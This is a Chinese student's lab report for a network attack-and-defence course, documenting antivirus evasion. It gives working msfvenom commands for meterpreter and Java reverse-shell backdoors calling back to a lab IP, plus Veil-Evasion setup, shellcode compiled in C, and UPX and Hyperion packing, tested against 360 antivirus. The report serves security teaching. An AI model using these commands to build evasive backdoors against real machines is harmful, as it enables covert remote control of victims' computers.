20192410 2021-2022-2 《网络与系统攻防技术》实验三 免杀原理与实践 实验报告

---

1.实验内容

(1)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧

• 正确使用msf编码器，使用msfvenom生成如jar之类的其他文件
• veil，加壳工具
• 使用C + shellcode编程

(2)通过组合应用各种技术实现恶意代码免杀

(3)用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

2.实验过程

2.1使用msfvenom生成如jar之类的其他文件

(1)生成exe文件，并上传网站进行检测

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.197.129 PORT=5555 -f exe > 20192410backdoor.exe

(2)这次多编码几次试试(通过-i设置编码次数)

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.197.129 LPORT=5555 -f exe > 20192410backdoor3.exe

与之前并没有什么区别

(3)生成jar文件

msfvenom -p java/shell_reverse_tcp  LHOST=192.168.197.129 LPORT=5555 -f jar > 20192410jar.jar

(4)生成python文件

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.197.129 PORT=2410 -f py > 20192410py.py

由于结果是0，让我对python产生了好奇，便找了刘宇栋老师指导文件中3.6.4同学案例中的python例子。

前面还算顺利，经过上网查找资料，唯一的问题最后也发现是python版本不对得到了解决，但是好不容易将py文件转换为exe文件后痛心地发现不能运行。弄了两三个小时也不知道是哪里出了问题，或许是我太菜了，最后无奈放弃。

2.2使用veil，加壳工具

2.2.1 veil

(1)安装veil

apt-get install veil-evasion

(2)使用veil

• 进入veil-evasion

     use evasion
  

• 进入配置界面

    use powershell/shellcode_inject/psexec_virtual.py c/meterpreter/rev_tcp.py 
  

• 设置IP和端口

    set LHOST 192.168.197.129  
    set LPORT 2410
  

• 生成文件

    generate
  

2.2.2 加壳工具

压缩壳

upx 20192410backdoor.exe -o 20192410_upx.exe

2.3 C+Shellcode

(1)生成一段C语言shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.197.129 LPORT=2410 -f c

(2)将生成的shellcode放入新建的c语言文件中

(3)对c文件进行编译，得到exe文件

i686-w64-mingw32-g++ 20192410c.c -o 20192410c.exe

2.4通过组合应用各种技术实现恶意代码免杀

C+Shellcode编程+压缩壳+加密壳

(1)将2.3中生成的exe文件加壳

(2)加密壳

• 安装Hyperion(这个好像是自带的，但是我没找到路径，就自己安装了)

• 将加壳后的文件放入Hyperion-2.2文件夹，再进行加密壳操作

   wine hyperion.exe -v 20192410c_upx.exe 20192410c_upx_hyp.exe
  

2.5用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

(1)首先修改虚拟机为桥接模式

(2)生成.raw文件

(3)将文件传给另一台电脑(360杀毒 版本:5.0.0.8170)，进行反弹回连

3.问题及解决方案

• 问题1：安装veil过程中产生报错
• 问题1解决方案：有许多方面的问题，例如需要先安装wine32，需要安装python，但是最搞心态的是教学楼网不行，用宿舍网虽然也不怎么快，但好歹能安装成功。
• 问题2：使用加密壳失败。
• 问题2解决方案：需要修改Hyperion-2.2中的makefile文件，将第一行改为 CC = i686-w64-mingw32-gcc后执行make进行编译

4.回答问题

（1）杀软是如何检测出恶意代码的？

  通过特征码或恶意行为检测。

（2）免杀是做什么？

  通过一些操作使得恶意代码不会被杀毒软件检测到。

（3）免杀的基本方法有哪些？

  修改特征码、花指令免杀、加壳免杀、内存免杀、二次编译、分离免杀、资源修改

5.学习感悟、思考等

  本次实验过程非常痛苦，虽然学到了许多“免杀”操作，但是生成的恶意代码放到网站里还是能被很多检测出来的，放到Windows里全都不可能在我的Windows下活过一秒。做到最后感觉不是在找更好的恶意代码而是在找更弱的杀毒软件。而且我发现虽然有的同学和我一样是Windows安全中心，但是在他们电脑上检测不出来的恶意程序我的电脑能检测出来，表示很是无语。不过生成的python文件检测结果竟然是0，而且传入windows后将其转为exe文件后也能在Windows下存活，但是不能并不能运行...... 不过总归是对后门免杀有了一定了解。

标签：文件,exe,免杀,python,20192410,2021,msfvenom,veil
来源： https://www.cnblogs.com/lxfdbkdz/p/16123430.html